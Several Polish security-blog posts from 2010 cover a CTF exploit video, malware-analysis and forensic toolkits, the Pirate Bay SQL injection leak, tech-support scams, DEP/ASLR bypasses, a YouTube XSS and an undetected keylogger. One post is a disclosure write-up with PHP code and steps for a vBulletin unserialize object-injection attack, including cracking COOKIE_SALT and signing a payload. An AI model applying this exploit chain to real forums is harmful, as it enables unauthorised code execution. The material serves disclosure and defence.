2010-07-09T14:30:00.001+02:00

Załóżmy, że chcemy utworzyć exploit zdolny do zaatakowania pewnej usługi pracującej na zdalnym serwerze. W tym celu musimy tylko odnaleźć lukę w zdalnej usłudze i utworzyć kod zdolny do jej wykorzystania. Jeśli chcemy, by nasz exploit był w stanie np. nie tylko przepełnić bufor, ale również wykonać jakieś działanie (np. dostarczyć odpowiedni shellcode) w zdalnym systemie, musimy również o to zadbać. Wszystko to wydaje się na pierwszy rzut oka oczywiste, jednak praktyczne wykonanie takiego ataku wymaga naprawdę sporych umiejętności. Zapraszam do obejrzenia materiału filmowego przedstawiającego przykładowe praktyczne wykonanie właśnie tego typu ataku.

Co prawda był to jedynie symulowany atak odbywający się w kontrolowanym środowisku w ramach konkursu How strong is your fu for charity, to jednak powyższy materiał ma duże walory edukacyjne. Więcej szczegółów na temat wszystkich zaprezentowanych powyżej działań można odnaleźć tutaj.

Specjalnie przygotowana na tę okazję usługa była oczywiście podatna na dość typowy atak, dzięki czemu uczestnicy mogli w rozsądnym czasie stworzyć swoje własne exploity. Nie zmienia to jednak faktu, że całe zadanie wymagało sporych umiejętności praktycznych, a zapis całego ataku testowego stanowi świetny materiał edukacyjny dla osób zainteresowanych tworzeniem własnych exploitów.

REMnux: zbiór narzędzi do analizy złośliwego kodu

2010-07-09T10:45:00.002+02:00

Złośliwy kod możemy w najprostszy sposób zdefiniować jako kod, którego celem jest wykonywanie działań szkodliwych z punktu widzenia docelowego systemu komputerowego lub też użytkowników tegoż systemu. Rozróżniamy bardzo wiele kategorii złośliwego oprogramowania, mogą więc to być programy infekujące system operacyjny, ale równie dobrze skrypty kierujące internautów na złośliwe witryny. Po co jednak w ogóle zaprzątać sobie głowę zaawansowaną analizą złośliwego kodu? Otóż zdecydowana większość tego typu programów dociera do nas jako closed-source, czyli w postaci kodu wykonywalnego. Jako że niemal nigdy nie dysponujemy źródłami, chcąc poznać zasadę działania danego programu, musimy właśnie poddać go zaawansowanej analizie z wykorzystaniem specjalistycznych narzędzi. Do tego zaś przyda nam się nowa dystrybucja Linuksa o nazwie REMnux.

REMnux to dystrybucja Linuksa stworzona przez znanego eksperta zajmującego się głównie informatyką śledczą oraz zaawansowaną analizą złośliwych programów. Lenny Zeltser oparł swą dystrybucję na popularnym Ubuntu i zgromadził w jej ramach sporą ilość narzędzi przydatnych do analizy złośliwego kodu. Są to narzędzia pozwalające zarówno na analizę statyczną, jak i dynamiczną. Znajdziemy tutaj również programy pozwalające na analizę plików wykonywalnych skompresowanych lub w inny sposób zabezpieczonych przed prostymi metodami analizy kodu. Analizować możemy również malware w postaciach typowych dla złośliwych witryn internetowych (np. JavaScript) oraz znane formaty dokumentów, takie jak PDF. Warto w tym momencie wymienić kilka narzędzi.

Do analizy złośliwych plików Flash przydadzą nam się narzędzia takie jak swftools, flasm oraz flare. Do swej dyspozycji mamy również programy pozwalające na analizą oraz ingerencję w transmisje sieciowe, takie jak Wireshark, Honeyd, INetSim, fakedns, czy też NetCat. Żadnych tajemnic nie uchowa przed nami również JavaScript, gdyż możemy skorzystać przykładowo z JavaScript Deobfuscatora. Do plików wykonywalnych zabezpieczonych przed analizą dobierzemy się natomiast za pomocą narzędzi: upx, packerid, bytehist, xorsearch, TRiD. Wreszcie, tajemnice skrywane przez tak popularne w ostatnim czasie złośliwe pliki PDF odkryjemy za pomocą programów: Dider's PDF tools, Origami framework, Jsunpack-n, czy też pdftk.

Dystrybucję REMnux w postacji maszyny wirtualnej oraz kilka porad dotyczących użytkowania systemu można odnaleźć pod tym adresem. Wszystkie osoby zainteresowana analizą złośliwych programów zachęcam więc do zapoznania się z tym ciekawym projektem oraz do wspomożenia Zeltsera w jego wysiłkach.

Pirate Bay: ogromny wyciek danych [video]

2010-07-08T10:41:00.011+02:00

Z bardzo popularnego serwisu thepiratebay.org wyciekły poświadczenia (nazwy użytkowników oraz skróty haseł wygenerowane za pomocą algorytmu MD5), adresy e-mailowe oraz adresy IP związane z około 4 milionami jego zarejestrowanych użytkowników. Wszystko to za sprawą podatności na atak typu SQL injection.

Udanego ataku dokonał Argentyńczyk ukrywający się pod pseudonimem Ch Russo. Dobranie się do bazy danych obsługującej serwis było możliwe za pomocą szeregu odnalezionych przez niego podatności typu SQL injection. Uzyskany dostęp pozwalał nie tylko na odczyt danych zgromadzonych w bazie, ale również na modyfikację niektórych z nich.

Ch Russo utrzymuje, że nie zmodyfikował w żaden sposób zawartości bazy danych, jednak opublikował informacje dotyczące jej struktury. Oto dowody świadczące o uzyskaniu przez niego dostępu do panelu administracyjnego:

Włamywacz opublikował również następujący materiał filmowy:

Wbrew pozorom uzyskane w trakcie powyższego ataku informacje mogą mieć bardzo dużą wartość. Wystarczy tylko pomyśleć o tym, ile są w stanie zapłacić za nie... wielkie wytwórnie filmowe i fonograficzne!

Na chwilę obecną thepiratebay.org nie jest dostępny, oficjalny komunikat pojawiający się po odwiedzeniu serwisu nie wspomina jednak ani słowem o incydencie i nie ostrzega w żaden sposób zarejestrowanych użytkowników przed grożącym im niebezpieczeństwem:

Upgrading some stuff, database is in use for backups, soon back again.. Btw, it's nice weather outside I think.

[źródło]

Atak metodą „na Pomoc Techniczną”

2010-07-07T15:45:00.007+02:00

Użytkownicy komputerów są z całą pewnością coraz bardziej świadomi typowych zagrożeń związanych z Internetem oraz stosowaniem nowoczesnych technologii informatycznych. Przeprowadzanie skutecznych ataków wymagających interakcji z użytkownikiem docelowego systemu przychodzi więc komputerowym przestępcom z dużym trudem. Wszystko to nie skutkuje jednak obniżeniem ilości ataków, lecz... pojawianiem się coraz skuteczniejszych metod ataku. Jednym z obecnie obserwowanych trendów, jest zwiększenie ilości ataków wykorzystujących bezpośredni kontakt intruza z ofiarą.

Najnowszy schemat ataku tego typu jest bardzo prosty i zarazem niezwykle skuteczny. Otóż intruz kontaktuje się z potencjalną ofiarą (osobą prywatną, pracownikiem biurowym, itp.) telefonicznie na zasadzie typowego cold callingu i przedstawia się przykładowo jako pracownik firmy XXX o rzekomym statusie Registered Microsoft Support Partner (pojęcie takie tak naprawdę w ogóle nie istnieje).

Ów rozmówca informuje potencjalną ofiarę o rzekomej paskudnej infekcji toczącej jej system Windows i oferuje (oczywiście płatną) usługę usunięcia wszelkich wirusów za pośrednictwem specjalnego programu pozwalającego na pomoc zdalną. Po uiszczeniu odpowiedniej opłaty, rozmówca wskaże nam profesjonalnie wyglądającą witrynę, z której tenże program (w rzeczywistości trojan lub inny malware) będziemy mogli pobrać. Strona domowa rzekomego partnera Microsoftu pełna jest certyfikatów oraz znaków potwierdzających partnerstwo. Znajdziemy na niej również numery telefonów (wyglądające na stacjonarne, w rzeczywistości wykupione u jednego z dostawców usług VoIP w odpowiedniej strefie numerowej), pod którymi rzeczywiście odpowiadają konsultanci z krwi i kości.

Cały schemat ataku brzmi znajomo i przypomina najnowsze działania twórców oprogramowania scareware. O ile jednak komunikaty o infekcji wyświetlane przez strony internetowe nie są już wiarygodne dla wielu internautów, o tyle atak na nasz system operacyjny (oraz portfel) poprzez operatora telefonicznego może być rzeczywiście zabójczo skuteczny.

Pracownicy dużych korporacji, jak i małych firm, są bardzo często obsługiwani przez zewnętrzne firmy zapewniające im informatyczną pomoc techniczną. Tego typu rozmowa telefoniczna, szczególnie jeśli operator nie wypytuje o hasła czy też inne poufne informacje, może nie wzbudzić żadnych daleko idących podejrzeń. Również osoby mniej obeznane z komputerami (np. osoby starsze) znacznie łatwiej mogą się nabrać na przekonywującą rozmowę telefoniczną, niż na typowe automatyczne ataki internetowe.

Pomijając już więc aspekty finansowe, w jaki sposób intruz może zainstalować złośliwy program (np. trojana) na komputerze pracownika dowolnej firmy lub korporacji? Wystarczy tylko zadzwonić do potencjalnej ofiary, przedstawić się jako pracownik odpowiedniej firmy świadczącej pomoc techniczną i poprosić naszego rozmówcę o zainstalowanie małego programiku umożliwiającego zdalną asystę techniczną. Jestem przekonany, że tego typu atak byłby w wielu przypadkach bardzo skuteczny...

[źródło]

Nie wierzmy zbytnio w technologie DEP i ASLR!

2010-07-07T11:55:00.003+02:00

Całkiem niedawno zapytałem pewnego znanego polskiego eksperta ds. bezpieczeństwa IT o to, w jaki sposób typowy użytkownik systemów operacyjnych z rodziny Windows ma szansę na obronę przed atakami typu Zero Day. W odpowiedzi usłyszałem tylko:

DEP i ASLR

Czy rzeczywiście te dwie technologie są na tyle skuteczne, że w praktyce są w stanie ochronić nas przed niemal wszystkimi rodzajami nowych ataków? Oczywiście nie, zobaczmy więc pokrótce dlaczego DEP i ASLR nie są w stanie powstrzymać zdeterminowanych intruzów.

Najpierw spróbujmy w jak najprostszy i zrozumiały sposób zdefiniować oba pojęcia. Otóż DEP (ang. Data Execution Prevention) jest zabezpieczeniem mającym na celu uniemożliwienie wykonania kodu znajdującego się obszarach pamięci przeznaczonych dla danych. Jeśli więc potencjalnemu intruzowi uda się atak polegający np. na przepełnieniu bufora, to DEP powinien zapobiec możliwości wykorzystania tego faktu do uruchomienia wrogiego kodu. Natomiast technologia rozproszenia danych w pamięci (ang. Adress Space Layout Randomisation) ma za zadanie uniemożliwienie intruzowi zlokalizowania adresu odpowiedniego do wykonania własnego kodu. Wszystko to wydaje się być całkiem skuteczną strategią obronną. Okazuje się jednak, że w praktyce wcale nie jesteśmy tak dobrze chronieni.

Przede wszystkim należy podkreślić, że DEP oraz ASLR nie chronią nas w jakiś magiczny sposób przed błędami w samych aplikacjach, ich zadaniem jest jedynie utrudnienie wykorzystania luki obecnej w danym programie do skutecznego uruchomienia złośliwego kodu. Jednak, żeby w ogóle skorzystać z dobrodziejstw obu technologii, dany program musi w sposób świadomy zostać do tego przystosowany. Tutaj pojawia się pierwszy poważny problem.

W systemach z rodziny Windows aplikacje za pośrednictwem odpowiednich flag decydują o wykorzystaniu (lub braku wykorzystania) obu technologii. Większość aplikacji z firmy Microsoft rzeczywiście poprawnie korzysta z obu rozwiązań, jednak jak się okazuje inni znani producenci często w ogóle nie korzystają z obu technologii! Przykładowo przeglądarki Firefox, Opera i Safari obsługują DEP, ale już nie ASLR. Jedynie Chrome korzysta z obu tych mechanizmów. Tak wygląda tabela prezentująca stan implementacji technologii DEP oraz ASLR w wielu popularnych aplikacjach na czerwiec tego roku:

Jednak brak praktycznego wykorzystywania obu mechanizmów to nie jedyny problem. Okazuje się, że już od jakiegoś czasu znane są skuteczne metody obejście obu technologii zabezpieczających. Wystarczy tylko przecież wspomnieć Petera Vreugdenhila, który w trakcie konkursu Pwn2Own 2010 zdobył Internet Explorera 8 pracującego w systemie Windows 7, właśnie obchodząc po drodze oba zabezpieczenia. Szczegółowe informacje na temat zastosowanych technik zostały następnie przez Petera upublicznione i są dostępne pod tym adresem. Kilka dni temu również badacze z firmy Immunity przedstawili swoją koncepcję ataków zdolnych do ominięcia obu zabezpieczeń, którą ochrzcili mianem JIT-SPRAY Attacks.

Co ciekawe, zdarzają się również luki w oprogramowaniu wykorzystującym mechanizm ASLR, które prowadzą do wycieku informacji przydatnych do... obejście samego ASLR. Otóż znana jest niezałatana do tej pory luka w Internet Explorerze 8, która to może prowadzić do wycieku pamięci zdradzającego krytyczne informacje na temat położenia adresów, które intruz może następnie wykorzystać do przeprowadzenia skutecznego ataku. Luka, obecna jest w kluczowym komponencie mshtml.dll, a jej odkrywca (Ruben Santamarta) opublikował wszystkie dotyczącej jej szczegóły pod tym adresem. Badacz opublikował również kod PoC, dzięki któremu możemy się przekonać o tym, że wyciek informacji z IE8 dotyczący krytycznego adresu rzeczywiście występuje.

Jak mogliśmy się przekonać na podstawie tych kilku powyższych przykładów, technologie DEP oraz ASLR są dalekie od tego, by móc skutecznie ochronić nas przed skutkami wszelkiego rodzaju nowych ataków na luki systematycznie odkrywane we wszystkich najpopularniejszych aplikacjach. Mechanizmy te stanowią co najwyżej element utrudniający nieco życie (a może czyniący je ciekawszym?) autorom nowych exploitów. Pytanie o to, co może nas skutecznie uchronić przed nowymi atakami typu Zero Day, pozostaje więc nadal bez odpowiedzi.

Atak na witrynę Royal Bank of Ireland [video]

2010-07-06T09:27:00.002+02:00

Początkowa próba ataku typu SQL injection poprzez ogólnodostępny formularz logowania nie dała żadnych rezultatów. Intruzowi udało się jednak uzyskać dostęp do logu zawierającego informacje o nieudanych próbach logowania. Dalej, poprzez zdobyte w ten sposób poświadczenia, możliwe było zalogowanie się do systemu na prawach zwykłego użytkownika. Wszystko to pozwala w końcu na wykorzystanie narzędzia SQLmap w celu dobrania się do bazy danych. Wreszcie, tabela login zdradza poświadczenia administracyjne, hasło było zaszyfrowane, jednak strona rot13.com okazała się być rozwiązaniem tego problemu. W końcu intruz mógł się już cieszyć administracyjnym dostępem do serwisu, który w dodatku pozwalał na wstrzykiwanie systemowych poleceń i wyświetlał wyniki ich wykonania w przeglądarce... zobaczmy to wszystko na własne oczy.

Oto zapis video dokumentujący przebieg powyższego ataku na witrynę Royal Bank of Ireland:

Co prawda był to jedynie symulowany atak odbywający się w kontrolowanym środowisku w ramach konkursu The Hex Factor 2009 - B300 Challenge, to jednak powyższy materiał ma duże walory edukacyjne. Specjalnie przygotowany na tę okazję serwis był oczywiście podatny na kilka typowych ataków, dzięki czemu uczestnicy mogli w rozsądnym czasie dotrzeć do pliku, którego zawartość stanowiła dowód zdobycia danego celu. Nie zmienia to jednak faktu, że całe zadanie wymagało sporych umiejętności praktycznych, a zapis całego ataku testowego stanowi świetny materiał edukacyjny dla osób zainteresowanych bezpieczeństwem aplikacji i serwisów internetowych.

Ciekawy sposób na zabicie Eksploratora w Windows XP

2010-07-05T20:28:00.005+02:00

Jeden z czytelników HCSL ukrywający się pod pseudonimem RicoElectrico, odkrył interesującą podatność Eksploratora Windows XP (explorer.exe) na atak za pomocą złośliwych skrótów (ang. Evil Shortcuts Attack). Problem dotyczy rekursywnych skrótów, które pozwalają w bardzo prosty sposób na wykończenie tego ważnego systemowego programu i jednocześnie domyślnej powłoki systemowej. W taki oto sposób autor odkrycia wyjaśnia szczegółowo przykładowy atak oraz jego potencjalne skutki:

~~Dla wszystkich leniwych przygotowałem odpowiednio spreparowane pliki gotowe do użycia, które wystarczy tylko rozpakować do dowolnego folderu w systemie Windows XP.~~ Zachęcam jednak do własnoręcznych testów. Ciekaw jestem, czy tzw. przeciętny użytkownik komputera z Windows XP poradziłby sobie z takimi dwoma plikami umieszczonymi na jego własnym pulpicie?

[Od redakcji]
Autorem powyższego odkrycia jest RicoElectrico (e-mail: ricoelectrico na orange.pl). Przy okazji pragnę jeszcze raz przypomnieć, że serwis HCSL jest niezwykle otwarty na wszelkie formy współpracy.

[źródło]

WinTaylor: zbiór przydatnych narzędzi śledczych dla Windowsów

2010-07-05T12:56:00.003+02:00

WinTaylor for caine to zbiór bardzo przydatnych narzędzi śledczych dla systemów operacyjnych z rodziny Windows. Przy okazji wydania wersji 2.0, warto zapoznać się z tym interesującym pakietem pozwalającym na stosunkowo proste zbieranie oraz raportowanie najrozmaitszych cyfrowych dowodów zgromadzonych w różnych wersjach systemów operacyjnych z rodziny Windows.

Wszystkie narzędzia zostały stworzone z wykorzystaniem języka Visual Basic 6, co pozwoliło na osiągnięcie maksymalnej kompatybilności ze starszymi wersjami Windowsów. Warto zwrócić uwagę, że niektóre antywirusy mogą rozpoznawać pakiet jako trojana lub innego rodzaju zagrożenie. Na czas pracy z narzędziem najlepiej będzie wyłączyć ochronę antywirusową.

WinTaylor jest rozwijany jako projekt otwartoźródłowy, co w przypadku narzędzi informatyki śledczej może mieć szczególne znaczenie. Otóż analiza kodu źródłowego (najczęściej niemożliwa do przeprowadzenia w przypadku rozwiązań komercyjnych) danego narzędzia może rozwiać wszelkie wątpliwości co do ewentualnego wpływu programu śledczego na stan analizowanego systemu.

Spójrzmy pokrótce na przykładowe możliwości samego pakietu. Moduł System Info pozwala na zebranie podstawowych informacji nt. sprzętu, jak i zainstalowanego w danym systemie oprogramowania:

Bardzo szczegółowych informacji na temat sprzętowych oraz programowych zasobów analizowanego systemu dostarczy nam również moduł WinAudit:

Na czasową analizę wykorzystania systemu pozwoli nam moduł PC On/Off. Na poniższym przykładzie widzimy przykładowo, że przez cały ostatni weekend, analizowany system pozostawał wyłączony:

W pakiecie znajdziemy nawet prosty skaner sieci lokalnej (Lan Scanner):

Nie zabrakło też edytora heksadecymalnego (Hex Editor), programów do odzyskiwania danych (Testdisk, Recuva), czy też narzędzia do akwizycji pamięci operacyjnej (RAM Dump). Pakiet zawiera również narzędzie wspomagające analizę historii wykorzystania urządzeń i pamięci przenośnych USB (USB Devices):

Do swej dyspozycji otrzymujemy również narzędzie (File Analyzer) wspomagające analizę wielu różnych formatów plików:

Poza tym, pakiet kryje setki innych, czasem bardzo zaawansowanych i specjalistycznych narzędzi (More Tools) pomocnych przy zbieraniu oraz analizie rozmaitych cyfrowych dowodów:

Jak mogliśmy się przekonać, WinTaylor to pakiet niezwykle interesujący, wyposażony w narzędzia proste w użyciu, mogące się przydać nawet przy małych, domowych dochodzeniach komputerowych. W jego ramach znajdziemy również bardziej zaawansowane narzędzia przydatne administratorom podczas podstawowej analizy prostych incydentów, ale również osobom zawodowo zajmującym się informatyką śledczą. Zachęcam więc wszystkich zaawansowanych użytkowników systemów z rodziny Windows oraz osoby zainteresowane tematyką analizy cyfrowych dowodów do zapoznania się z naprawdę okazałymi możliwościami WinTaylora.

XSS w YouTube.com

2010-07-05T09:22:00.005+02:00

W powszechnie znanym i bardzo popularnym serwisie YouTube.com odnaleziona została wczoraj luka typu Persistent XSS. Za pośrednictwem odpowiedniego komentarza dodanego do filmu, możliwe było wstrzyknięcie własnego potencjalnie niebezpiecznego kodu. W ten oto sposób serwis zapamiętywał wprowadzony kod i prezentował go kolejnym odwiedzającym dany adres internautom. Przyjrzyjmy się potencjalnym skutkom tego typu ataku.

Prosty kod pozwalał na wyświetlenie alertu:

Oto zarejestrowany przykład dokumentujący proste wstrzyknięcie kodu HTML:

Tego typu podatność pozwala również na całkowitą zmianę wyglądu witryny (defacement):

To jednak nie wszystko. Podatność mogła również pozwolić intruzom na kradzież m.in. session cookies. Na szczęście wydaje się jednak, że nie mogło to prowadzić do uzyskania nieuprawnionego dostępu do innych usług Google (poza serwisem YouTube), ponieważ wszystkie inne usługi znajdują się w innych domenach.

W całej sprawie warto również podkreślić natychmiastową reakcję administratorów serwisu, którzy dosłownie w ciągu kilku godzin od upublicznienia informacji na temat luki, uniemożliwili dodawanie potencjalnie niebezpiecznych komentarzy.

[źródło]

vBulletin: interesująca podatność typu script injection

2010-07-04T18:28:00.004+02:00

Zapraszam do zapoznania się z poniższym artykułem autorstwa Dariusza Tytko.

Jakiś czas temu przeglądając kod źródłowy popularnego komercyjnego skryptu internetowego forum dyskusyjnego, odkryłem interesującą podatność. Oto szczegółowa analiza tego przypadku. Najpierw jednak musimy rozpocząć od odrobiny teorii z PHP. Wyobraźmy sobie następujący fragment kodu:

$data = unserialize($data_from_user);



if (!is_array($data)) {



   return;

}

Kod wygląda całkiem niewinnie, jeżeli odebrane dane nie są zserializowaną tablicą, funkcja kończy działanie... No tak, ale co w przypadku, gdy użytkownik dostarczy obiekt klasy? Okazuje się, że wówczas wykonany zostanie destruktor tej klasy. Pytanie, czy możemy w jakiś sposób wykorzystać to zachowanie języka PHP? Jak najbardziej, wystarczy, że w kodzie badanej aplikacji znajdziemy klasę, której destruktor wykonuje jakąś konkretną akcję, np. usuwa pliki tymczasowe:

class Cleaner {


    public function __destruct() {

        foreach ($this->_toDelete as $f)

            unlink($f);

    }

    public function add($f) {

        $this->_toDelete[] = $f;

    }

    private $_toDelete = array();

}

Teraz użytkownik, może wykonać (lokalnie) następujące działanie:

$x = new Cleaner();


$x->add('index.html');

$payload = serialize($x);

I wysłać $payload do aplikacji, gdzie destruktor posłusznie usunie plik index.html. Tyle teorii, czas na przykład z życia wzięty.

Jakiś czas temu przeglądałem kod źródłowy forum vBulletin, które jak się okazało, zawiera dość nietypowy błąd typu script injection. Podatności w żadnym wypadku nie można zaliczyć do grona krytycznych, gdyż pozwala wywołać na zdalnej maszynie jedynie dowolną, bezparametrową funkcję języka PHP np: phpinfo. Myślę jednak, że jest na tyle ciekawa, że warto o niej wspomnieć na forum publicznym.

Oto szczegóły. Plik subscription.php zawiera, między innymi, następujący blok kodu:

$ids = @unserialize(verify_client_string($vbulletin->GPC['ids']));





if (!is_array($ids) OR empty($ids))

{

// error handling...

}

Wygląda znajomo prawda? Pojawia się jednak dodatkowy poziom trudności, gdyż odebrane dane poddawane są weryfikacji. Mamy więc przed sobą dwa problemy:

Weryfikacja danych
Odnalezienie w kodzie aplikacji klasy, która posiada użyteczny destruktor

W pierwszej kolejności zajmiemy się weryfikacją. Funkcja verify_client_string wygląda następująco:

function verify_client_string($string, $extra_entropy = '')


{

    if (substr($string, 0, 4) == 'B64:')

    {

            $firstpart = substr($string, 4, 40);

            $return = substr($string, 44);

            $decode = true;

    }

    else

    {

            $firstpart = substr($string, 0, 40);

            $return = substr($string, 40);

            $decode = false;

    }




    if (sha1($return . sha1(COOKIE_SALT) . $extra_entropy) === $firstpart)

    {

            return ($decode ? base64_decode($return) : $return);

    }




    return false;

}

Jak widzimy, aby aplikacja przyjęła dane użytkownika, muszą one zostać podpisane. Żeby tego dokonać musimy znać wartość COOKIE_SALT. Okazuje się, że domyślna wartość COOKIE_SALT to nr licencji, który ma następujący format: VBXXXXXXXX, gdzie XXXXXXXX to liczba w postaci szesnastkowej. W praktyce wszystkie klucze licencji, które sprawdziłem miały format: VBFXXXXXXX, mamy więc 2^28 kombinacji. Trochę za dużo na atak on-line. Nie wszystko jednak stracone. Okazuje się, ze vBulletin na podstawie wartości COOKIE_SALT oblicza wartość tokenu chroniącego przed atakami CSRF, który siłą rzeczy przesyłany jest do użytkownika. Wspomniany token wyliczany jest w następujący sposób:

$user['securitytoken_raw'] = sha1($user['userid'] . sha1($user['salt']) . sha1(COOKIE_SALT));

$user['securitytoken'] = TIMENOW . '-' . sha1(TIMENOW . $user['securitytoken_raw']);

userid to wartość publicznie znana, pozostaje salt, która jest wartością losową, stałą dla każdego użytkownika. Wyliczana jest w następujący sposób:

function fetch_user_salt($length = 3)


{

    $salt = '';

    for ($i = 0; $i < $length; $i++)

    {

            $salt .= chr(rand(33, 126));

    }

    return $salt;

}

Mamy więc 94^3 kombinacji wartości salt. W połączeniu z liczbą kombinacji wartości COOKIE_SALT 2^28 dostajemy 94^3 * 2^28 przypadków jakie musimy sprawdzić, aby odtworzyć wartość COOKIE_SALT z tokenu zabezpieczającego. Nadal dużo, nawet na atak off-line.

Po chwili poszukiwań, na stronie "reply post" znajdujemy wartość, która wyliczana jest w następujący sposób:

$poststarttime = TIMENOW;

$posthash = md5($poststarttime . $vbulletin->userinfo['userid'] . $vbulletin->userinfo['salt']);

Bingo! Odtworzenie wartości salt z tak wyliczonego hasha to dosłownie chwila. Mając wartość salt, możemy wrócić do łamania wartości COOKIE_SALT na podstawie securitytoken. Po chwili powinniśmy mieć upragnioną wartość COOKIE_SALT!

Zajmiemy się teraz drugim problemem - poszukiwanie klasy posiadającej użyteczny destruktor. Rezultat poszukiwań to klasa vB_Shutdown (plik class_core.php), której destruktor wygląda następująco:

function __destruct()


{

if (!empty($this->shutdown))

{

foreach ($this->shutdown AS $key => $funcname)

{

    $funcname();

    unset($this->shutdown[$key]);

}

}

}

Jak widać klasa jest niemal stworzona do wykorzystania w tego typu ataku. Jej destruktor wywołuje listę funkcji PHP! Niestety, w tym wypadku mogą to być tylko funkcje nie posiadające argumentów.

Teraz możemy wykorzystać wszystkie zdobyte do tej pory informacje do przeprowadzenia ataku:

Tworzymy obiekt następującej klasy:

class vB_Shutdown {


    public $shutdown = array(

"phpinfo"

    );

}

$payload = new vB_Shutdown();

Serializujemy payload:

$payload = serialize($payload);

Podpisujemy payload (algorytmem wykorzystywanym przez vBulletin) używając wyliczonej wartości COOKIE_SALT.

Wysyłamy payload do aplikacji i czekamy na rezultat wykonania funkcji phpinfo.

Błąd został zgłoszony kilka miesięcy temu, dostępne są odpowiednie aktualizacje. Z technicznego punktu widzenia, poprawka sprowadza się do rezygnacji z serializacji, na rzecz kodowania tablicy w postaci ciągu tekstowego "1,2,3,...,n". Warto zaznaczyć, że bardzo łatwo można zablokować opisany atak, nawet w przypadku niezaktualizowanej wersji oprogramowania, poprzez ustawienie zmiennej konfiguracyjnej $config['Misc']['cookie_security_hash'] (plik includes/config.php) na odpowiednio długi, losowy ciąg znaków. Ten prosty zabieg sprawia, że wartość ta zostanie użyta jako COOKIE_SALT (zamiast numeru licencji).

[Od redakcji]

Autorem powyższego artykułu jest Dariusz Tytko (e-mail: tyter9 na Gmailu). Przy okazji pragnę jeszcze raz przypomnieć, że serwis HCSL jest niezwykle otwarty na wszelkie formy współpracy.

Otwartoźródłowy, niewykrywalny dla antywirusów keylogger

2010-07-03T14:41:00.002+02:00

Keyloggery, czyli specjalne programy lub urządzenia służące do rejestrowania w docelowym systemie wszystkich wprowadzanych za pomocą klawiatury znaków, mogą przyjmować bardzo różne formy. Omawiałem już swego czasu bardzo interesujący przykład otwartego keyloggera sprzętowego przeznaczonego do samodzielnego montażu. Keylogger może również przyjmować postać dodatku do popularnego Firefoksa. Dziś natomiast chciałbym zaprezentować interesujący przykład otwartoźródłowego keyloggera dla systemów z rodziny Windows.

Keylogger 0.1 to prosty program pozwalający na rejestrowanie wszystkich wprowadzanych znaków w systemach z rodziny Windows (działa zarówno w leciwym już XP, jak i najnowszej Siódemce) opublikowany na Powszechnej Licencji Publicznej GNU. Dzięki temu do dyspozycji mamy program oraz jego kod źródłowy w języku C++, co niesie ze sobą niewątpliwe walory edukacyjne. Poza tym, Keylogger 0.1 możemy dzięki temu wszystkiemu zmodyfikować, udoskonalić lub w jakikolwiek sposób wykorzystać we własnym projekcie.

Program natychmiast po uruchomieniu rozpoczyna rejestrowanie wszystkich wprowadzanych znaków, tworząc na bieżąco prosty tekstowy log. Warto podkreślić, że w chwili obecnej program ten nie jest wykrywany jako zagrożenie przez żaden z kilkudziesięciu popularnych antywirusów dostępnych w ramach usługi Virustotal:

Dzięki temu, potencjalny intruz chcący poznać wszystkie wprowadzane przez nas w naszym systemie ciągi znaków (w tym nasze hasła) może po prostu uruchomić w naszym systemie (lokalnie lub też zdalnie) program Keylogger 0.1, nie martwiąc się o natychmiastowe wykrycie próby uruchomienia niebezpiecznego programu.

Przykład tego prostego keyloggera przypomina nam ponownie o tym, że zezwalanie innym osobom na choćby chwilowe skorzystanie z naszego systemu nie jest dobrym pomysłem. Zainteresowanych metodami tworzenia programowych keyloggerów zachęcam do zapoznania się z kodem źródłowym, natomiast wszystkich zachęcam do dyskusji na temat potencjalnych metod obrony przed złośliwym oprogramowaniem stworzonym przez potencjalnego intruza od podstaw, które dzięki temu nie jest wykrywane przez dostępne w danej chwili pakiety i programy zabezpieczające.

[źródło]

Czy Windows w aparaturze medycznej to dobry pomysł?

2010-07-02T15:04:00.001+02:00

Blue Screen of Death (BSoD, ang. Niebieski ekran śmierci), czyli bardzo charakterystyczny objaw poważnego błędu systemu operacyjnego z rodziny Microsoft Windows, znają niemal wszyscy użytkownicy komputerów na świecie i to nie tylko użytkownicy systemów operacyjnych rodem z amerykańskiego Redmond. BSoD jest bardzo często obiektem rozmaitych żartów, co ciekawe nawet sam Microsoft udostępnia żartobliwy symulator krytycznej awarii. Niestety awarie systemów Windows mogą również dostarczać wielu bardzo negatywnych emocji, tak jak to ma miejsce chociażby w przypadku sprzętu... medycznego.

Specjalistyczny sprzęt oraz rozmaite systemy przemysłowe coraz częściej pracują pod kontrolą systemów z rodziny Windows. Microsoft w ostatnich latach zrobił bez wątpienia bardzo wiele w kierunku poprawy stabilności działania własnego oprogramowania systemowego, niestety rozmaite awarie zdarzają się nadal i nie omijają również systemów przemysłowych, czy też nawet... medycznych:

Czy więc wykorzystywanie systemów Windows do nadzorowanie pracy systemów monitorujących lub podtrzymujących funkcje życiowe pacjentów to na pewno dobry pomysł?

Nowa zabawka z Elcomsoftu (Internet Password Breaker)

2010-07-02T09:51:00.003+02:00

Rosyjska firma Elcomsoft jest z pewnością znana wszystkim osobom, które kiedykolwiek interesowały się tematyką odzyskiwania (łamania) najrozmaitszych haseł. Do szerokiej gamy produktów Elcomsoftu dołączył właśnie Internet Password Breaker, który to jest w stanie wydobyć hasła zapisane i przechowywane w wielu różnych aplikacjach służących nam na co dzień do korzystania z zasobów globalnej pajęczyny.

Moja przygoda z produktami firmy Elcomsoft rozpoczęła się od programu Advanced Office Password Breaker. Program ten pozwalał swego czasu na odszyfrowanie niemal każdego zabezpieczonego przed otwarciem dokumentu utworzonego za pomocą pakietu Microsoft Office. Co ciekawe, żadnego znaczenia nie miała siła zastosowanego hasła. Działo się tak, ponieważ domyślny algorytm szyfrowania w pakiecie biurowym Microsoftu wykorzystywał zaledwie 40-bitowy klucz! W efekcie, jak pamiętam, otwarcie dowolnego dokumentu za pomocą metody sprawdzenia wszystkich możliwych kombinacji klucza było w zasięgu zwykłego domowego komputera i to w czasie nie przekraczającym kilkudziesięciu godzin!

Dosłownie wczoraj do grona niezliczonych produktów firmy Elcomsoft dołączył program Internet Password Breaker. Aplikacja ta pozwala nam, na (zazwyczaj natychmiastowe) zautomatyzowane wydobycie poświadczeń zapisanych i przechowywanych przez najrozmaitsze aplikacje takie jak przeglądarki internetowe, czy też programy pocztowe. Obsługiwany jest więc między innymi Internet Explorer, czy też Microsoft Outlook:

Niestety, wygląda na to, że rosyjska firma skupiła się jedynie na programach firmy Microsoft.

